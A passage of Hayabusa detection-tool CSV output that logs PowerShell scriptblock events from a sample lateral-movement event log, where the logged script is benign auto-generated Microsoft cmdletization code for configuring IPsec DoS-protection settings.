$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 
= $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially 
Malicious PwSh,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 